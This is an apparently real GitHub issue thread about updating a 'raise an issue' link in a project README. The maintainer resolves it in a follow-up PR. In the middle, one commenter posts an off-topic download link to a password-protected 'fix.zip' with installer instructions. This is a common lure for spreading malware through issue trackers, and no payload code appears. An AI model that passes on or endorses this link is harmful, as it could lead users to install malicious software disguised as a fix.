### ISSUE TITLE
Need to update " raise an issue" link in Readme

### ISSUE THREAD

**Issue by heidinett** [ACCESS-Community-Hub/atmosphere-cookbook#10]
Need to update " raise an issue" link in Readme to point to new location of Atmosphere Cookbook repo.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by heidinett** [comment]
Fixed in PR #11
